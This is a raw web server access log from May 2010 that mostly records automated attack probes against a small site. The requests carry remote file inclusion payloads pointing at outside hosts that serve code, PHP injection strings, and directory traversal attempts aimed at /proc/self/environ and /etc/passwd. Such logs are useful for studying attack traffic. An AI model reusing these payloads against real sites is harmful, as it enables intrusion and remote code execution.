213.128.84.14 - - [30/May/2010:22:39:37 -0500] "GET /logs/access_log.1271548800//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:37 -0500] "GET /logs/access_log.1272153600//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:37 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:37 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:39 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:39 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:39 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:41 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:41 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:41 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:39:45 -0500] "GET /logs/access_log.1273363200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:39:45 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:39:45 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:40:20 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:40:20 -0500] "GET /logs/access_log.1273363200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:40:20 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:41:17 -0500] "GET /logs/access_log.1223683200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:41:33 -0500] "GET /logs/access_log.1223683200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:41:51 -0500] "GET /logs/access_log.1223683200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:42:10 -0500] "GET /logs/access_log.1223683200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.43.180.250 - - [30/May/2010:22:42:18 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [30/May/2010:22:43:21 -0500] "GET /costume/thmb4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
120.50.40.133 - - [30/May/2010:22:44:00 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
200.43.180.250 - - [30/May/2010:22:44:11 -0500] "GET /logs/access_log.1273363200///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:22:44:12 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:22:44:12 -0500] "GET /logs///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
207.46.199.191 - - [30/May/2010:22:44:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.52.108.60 - - [30/May/2010:22:44:56 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.43.180.250 - - [30/May/2010:22:45:07 -0500] "GET /logs/access_log.1273017600///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
65.55.51.112 - - [30/May/2010:22:45:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [30/May/2010:22:46:02 -0500] "GET /logs/access_log.1181692800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.232.202.236 - - [30/May/2010:22:50:13 -0500] "GET /logs/access_log.1232668800//comments.php?AMG_serverpath=http://our.anet.com//modules/idr.pdf?? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
204.232.202.236 - - [30/May/2010:22:50:14 -0500] "GET //comments.php?AMG_serverpath=http://our.anet.com//modules/idr.pdf?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
204.232.202.236 - - [30/May/2010:22:50:14 -0500] "GET /logs//comments.php?AMG_serverpath=http://our.anet.com//modules/idr.pdf?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
204.232.202.236 - - [30/May/2010:22:50:26 -0500] "GET /logs/access_log.1223683200//comments.php?AMG_serverpath=http://our.anet.com//modules/idr.pdf?? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
217.73.228.20 - - [30/May/2010:22:58:42 -0500] "GET /logs/*.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.73.228.20 - - [30/May/2010:22:58:42 -0500] "GET /*.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
67.228.226.12 - - [30/May/2010:23:00:33 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:23:00:33 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:23:00:33 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.55.65.134 - - [30/May/2010:23:03:24 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:24 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:24 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:27 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:27 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:28 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:23:03:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
189.108.172.26 - - [30/May/2010:23:04:10 -0500] "GET /logs//estrutura/enquetes/booth.php?include_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 318 "-""libwww-perl/5.808"
189.108.172.26 - - [30/May/2010:23:04:12 -0500] "GET //estrutura/enquetes/booth.php?include_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-""libwww-perl/5.808"
207.46.13.142 - - [30/May/2010:23:05:56 -0500] "GET /logs/access_log.1170547200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.208.34.38 - - [30/May/2010:23:06:04 -0500] "GET /logs/access_log.1274227200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ssghost.com/wso/gold/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.208.34.38 - - [30/May/2010:23:06:04 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ssghost.com/wso/gold/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.208.34.38 - - [30/May/2010:23:06:04 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ssghost.com/wso/gold/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
207.46.204.190 - - [30/May/2010:23:10:26 -0500] "GET /logs/access_log.1170201600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [30/May/2010:23:11:26 -0500] "GET /logs/access_log.1205193600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.208.34.38 - - [30/May/2010:23:13:07 -0500] "GET /logs/access_log.1274227200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ssghost.com/wso/gold/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
81.208.34.38 - - [30/May/2010:23:13:08 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ssghost.com/wso/gold/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
81.208.34.38 - - [30/May/2010:23:13:08 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ssghost.com/wso/gold/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
212.69.218.47 - - [30/May/2010:23:13:12 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.occidentalthoroughbred.com/log.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.73"
200.61.185.200 - - [30/May/2010:23:13:41 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [30/May/2010:23:13:47 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
90.156.196.18 - - [30/May/2010:23:13:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://aucseon.ru/includes/meta.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.834"
77.221.130.2 - - [30/May/2010:23:14:09 -0500] "GET /?INCLUDE_FOLDER=http://www.zooluxx.ru//1.pdf?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
77.221.130.2 - - [30/May/2010:23:14:09 -0500] "GET /logs/access_log.1271548800/?INCLUDE_FOLDER=http://www.zooluxx.ru//1.pdf?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.2 - - [30/May/2010:23:14:09 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.zooluxx.ru//1.pdf?? HTTP/1.1" 200 7670 "-""Mozilla/5.0"
95.156.233.139 - - [30/May/2010:23:14:34 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [30/May/2010:23:14:34 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.156.233.139 - - [30/May/2010:23:14:34 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [30/May/2010:23:14:35 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
213.186.60.116 - - [30/May/2010:23:14:41 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:14:41 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:14:58 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
66.249.65.59 - - [30/May/2010:23:15:01 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 200 586690 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.186.60.116 - - [30/May/2010:23:15:08 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:15:14 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:15:15 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:23:15:26 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:23:15:26 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:23:15:26 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:23:15:26 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
189.108.172.26 - - [30/May/2010:23:17:46 -0500] "GET /logs//estrutura/enquetes/booth.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""libwww-perl/5.808"
189.108.172.26 - - [30/May/2010:23:17:48 -0500] "GET //estrutura/enquetes/booth.php?include_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.808"
212.69.218.47 - - [30/May/2010:23:18:35 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.occidentalthoroughbred.com/log.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.73"
212.69.218.47 - - [30/May/2010:23:18:35 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.occidentalthoroughbred.com/log.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.73"
212.69.218.47 - - [30/May/2010:23:18:35 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.occidentalthoroughbred.com/log.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.73"
119.63.198.56 - - [30/May/2010:23:19:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [30/May/2010:23:21:20 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
90.156.196.18 - - [30/May/2010:23:22:06 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://aucseon.ru/includes/meta.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.834"
90.156.196.18 - - [30/May/2010:23:22:06 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://aucseon.ru/includes/meta.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.834"
90.156.196.18 - - [30/May/2010:23:22:07 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://aucseon.ru/includes/meta.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
200.61.185.200 - - [30/May/2010:23:26:22 -0500] "GET /errors.php?error=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:23:26:28 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:23:26:28 -0500] "GET /logs/errors.php?error=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
38.101.148.126 - - [30/May/2010:23:27:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [30/May/2010:23:27:14 -0500] "GET /logs/access_log.1244160000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
212.69.218.47 - - [30/May/2010:23:27:57 -0500] "GET /logs/access_log.1223683200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.occidentalthoroughbred.com/log.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.73"
64.22.67.37 - - [30/May/2010:23:28:00 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.22.67.37 - - [30/May/2010:23:28:00 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/error.php?dir=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.22.67.37 - - [30/May/2010:23:28:00 -0500] "GET //skin/zero_vote/error.php?dir=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.46.13.136 - - [30/May/2010:23:30:56 -0500] "GET /logs/access_log.1176681600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.50 - - [30/May/2010:23:31:56 -0500] "GET /logs/access_log.1266105600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.61.185.200 - - [30/May/2010:23:32:44 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [30/May/2010:23:32:44 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
90.156.196.18 - - [30/May/2010:23:34:03 -0500] "GET /logs/access_log.1223683200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://aucseon.ru/includes/meta.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.834"
92.241.190.214 - - [30/May/2010:23:36:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
81.92.204.67 - - [30/May/2010:23:40:16 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:16 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:16 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:17 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:17 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:18 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:23 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:23 -0500] "GET /logs/access_log.1271635200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:23 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:30 -0500] "GET /logs/access_log.1271635200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:30 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:23:40:30 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.186.60.116 - - [30/May/2010:23:41:17 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:41:17 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:41:24 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:41:25 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:41:29 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [30/May/2010:23:41:29 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
